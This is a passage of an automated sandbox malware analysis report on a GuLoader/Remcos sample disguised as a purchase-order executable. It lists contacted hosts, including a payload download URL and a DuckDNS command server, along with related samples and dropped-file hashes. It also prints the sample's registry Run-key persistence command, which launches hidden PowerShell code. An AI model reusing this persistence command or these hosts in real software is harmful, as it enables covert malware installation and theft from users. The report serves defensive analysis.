                        http://geoplugin.net/json.gpdwab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.imvu.comrwab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://geoplugin.net/json.gpgwab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://geoplugin.net/json.gpiwab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.imvu.comwab.exefalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://geoplugin.net/json.gprwab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://nsis.sf.net/NSIS_ErrorErrorz14Novospedidosdecompra_Profil_4903.exe, 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp, z14Novospedidosdecompra_Profil_4903.exe, 00000000.00000000.1666780592.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                        		high
                                        http://geoplugin.net/json.gp09wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://ricohltd.top/PIoDroeALMbPB243.binnwab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://geoplugin.net/json.gpzwab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2394581791.00000000051B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.2954637411.00000000255E0000.00000040.10000000.00040000.00000000.sdmpfalse
                                                  		unknown
                                                  https://ricohltd.top/wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.google.comwab.exefalse
                                                      		high
                                                      http://geoplugin.net/wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://geoplugin.net/json.gpEwab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2417578332.000000000974C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/powershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2398641470.00000000060CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/accounts/serviceloginwab.exefalse
                                                                		high
                                                                https://login.yahoo.com/config/loginwab.exefalse
                                                                  		high
                                                                  https://ricohltd.top/PIoDroeALMbPB243.binBwab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.nirsoft.net/wab.exefalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2394581791.0000000005061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.ebuddy.comwab.exefalse
                                                                        • URL Reputation: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.60.38
                                                                        		ricohltd.topUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        178.237.33.50
                                                                        		geoplugin.netNetherlands
                                                                        		8455ATOM86-ASATOM86NLfalse
                                                                        193.222.96.21
                                                                        		learfo55ozj01.duckdns.orgGermany
                                                                        		3303SWISSCOMSwisscomSwitzerlandLtdCHtrue

                                                                        General Information

                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                        Analysis ID:1428880
                                                                        Start date and time:2024-04-19 19:10:07 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 16s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:16
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:z14Novospedidosdecompra_Profil_4903.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@21/15@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 94%
                                                                        • Number of executed functions: 193
                                                                        • Number of non-executed functions: 286
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6452 because it is empty
                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • VT rate limit hit for: z14Novospedidosdecompra_Profil_4903.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        18:12:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)
                                                                        18:12:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)
                                                                        19:10:59API Interceptor44x Sleep call for process: powershell.exe modified
                                                                        19:12:43API Interceptor75x Sleep call for process: wab.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        104.21.60.38COPY.docGet hashmaliciousUnknownBrowse
                                                                        • ricohltd.top/pages/microzx.scr
                                                                        93Vc4lrukRxn3WG.exeGet hashmaliciousFormBookBrowse
                                                                        • www.peacemyanmar.com/c8ec/?i2Jx-=JbnHKQNA4AubQ4cSTRqCUjsV30iNMKVb/qiRb+TdpY0tAokv3PP5G3/qX2Zn4Kqzke2C&3fb=t8Cle8U
                                                                        178.237.33.50SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • geoplugin.net/json.gp
                                                                        UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • geoplugin.net/json.gp
                                                                        2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        • geoplugin.net/json.gp
                                                                        dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        tu.exeGet hashmaliciousRemcosBrowse
                                                                        • geoplugin.net/json.gp
                                                                        RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        • geoplugin.net/json.gp
                                                                        F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                        • geoplugin.net/json.gp
                                                                        193.222.96.21UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                          Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                            documents 53 ACH 775-53 ABM 912.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                              MDU9342434.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                C3441067 Non Interventional Protocol Abstract_08Feb2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                  3250391200054 - EU14303 COTTERLEY Th#U00e9 Noir Darjeeling.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    GOZDE BAYRAKTAR DH404R POTI CSV LOADING ORDERS.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                      1151_AZKOND_-_KELBECER_30.01.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                        copesetic_glasrr.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          B4pdM0gRs3.exeGet hashmaliciousGuLoader, RemcosBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            learfo55ozj01.duckdns.orgUMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            documents 53 ACH 775-53 ABM 912.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            MDU9342434.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            C3441067 Non Interventional Protocol Abstract_08Feb2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            3250391200054 - EU14303 COTTERLEY Th#U00e9 Noir Darjeeling.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            GOZDE BAYRAKTAR DH404R POTI CSV LOADING ORDERS.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            1151_AZKOND_-_KELBECER_30.01.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            copesetic_glasrr.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            B4pdM0gRs3.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            ricohltd.topUMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 172.67.191.112
                                                                                            COPY.docGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.60.38
                                                                                            geoplugin.netSecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            tu.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 178.237.33.50

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            SWISSCOMSwisscomSwitzerlandLtdCHUMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.21
                                                                                            wFtZih4nN9.elfGet hashmaliciousMiraiBrowse
                                                                                            • 85.7.65.219
                                                                                            dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 193.222.96.11
                                                                                            http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 193.222.96.132
                                                                                            enEQvjUlGl.elfGet hashmaliciousMiraiBrowse
                                                                                            • 178.194.189.44
                                                                                            Oo2yeTdq5J.elfGet hashmaliciousMiraiBrowse
                                                                                            • 85.2.40.128
                                                                                            3OcPSlVa7n.elfGet hashmaliciousMiraiBrowse
                                                                                            • 161.78.204.214
                                                                                            rc21AW1MZD.elfGet hashmaliciousMiraiBrowse
                                                                                            • 164.195.100.221
                                                                                            hYN45tzxwl.elfGet hashmaliciousMiraiBrowse
                                                                                            • 164.208.232.102
                                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                                            • 164.209.76.204
                                                                                            CLOUDFLARENETUShttps://wetransfer.com/downloads/63408c72b6333965afb0118ce81f53d220240419112437/2452e85458854b24e1ec42e87285f82420240419112457/7d30d1?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.17.25.14
                                                                                            https://edbullardcompany-my.sharepoint.com/:f:/g/personal/eric_rosario_bullard_com/EoLKvcaqSE1Go3fA5to5CQABtxAftKTD0ktrakp7rbi4Xg?e=Mvbf0DGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 172.64.41.3
                                                                                            SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.75.43
                                                                                            SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.213.82
                                                                                            PO-095325.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.12.205
                                                                                            https://docx-nok.online/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                            • 172.67.179.148
                                                                                            https://download-myproposal.xyzGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                            • 104.17.2.184
                                                                                            SenPalia.exeGet hashmaliciousUnknownBrowse
                                                                                            • 172.64.41.3
                                                                                            Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 172.67.74.152
                                                                                            https://royaltattoo.in/js/kalexander@yourlawyer.comGet hashmaliciousPhisherBrowse
                                                                                            • 104.17.25.14
                                                                                            ATOM86-ASATOM86NLSecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            tu.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 178.237.33.50

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                            • 104.21.60.38
                                                                                            Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 104.21.60.38
                                                                                            eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                                                            • 104.21.60.38
                                                                                            SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                            • 104.21.60.38
                                                                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 104.21.60.38
                                                                                            SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.60.38
                                                                                            SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.60.38
                                                                                            POTWIERDZENIE_TRANSAKCJI_20240418145856.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 104.21.60.38
                                                                                            eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                            • 104.21.60.38
                                                                                            SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • 104.21.60.38

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):963
                                                                                            Entropy (8bit):4.995620093649274
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro
                                                                                            MD5:334018F02CE31BCBB4864D602B557FE5
                                                                                            SHA1:C6DE43E8D6B5C026C0B0A56A898A3F00B282B881
                                                                                            SHA-256:F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
                                                                                            SHA-512:31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):8003
                                                                                            Entropy (8bit):4.838950934453595
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                                            MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                                            SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                                            SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                                            SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eiylbra4.1bj.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psk4hbo2.z4a.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\bhv6644.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):15728640
                                                                                            Entropy (8bit):0.10805027086476268
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                                                            MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                                                            SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                                                            SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                                                            SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                                                            Malicious:false
                                                                                            Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Qn:Qn
                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
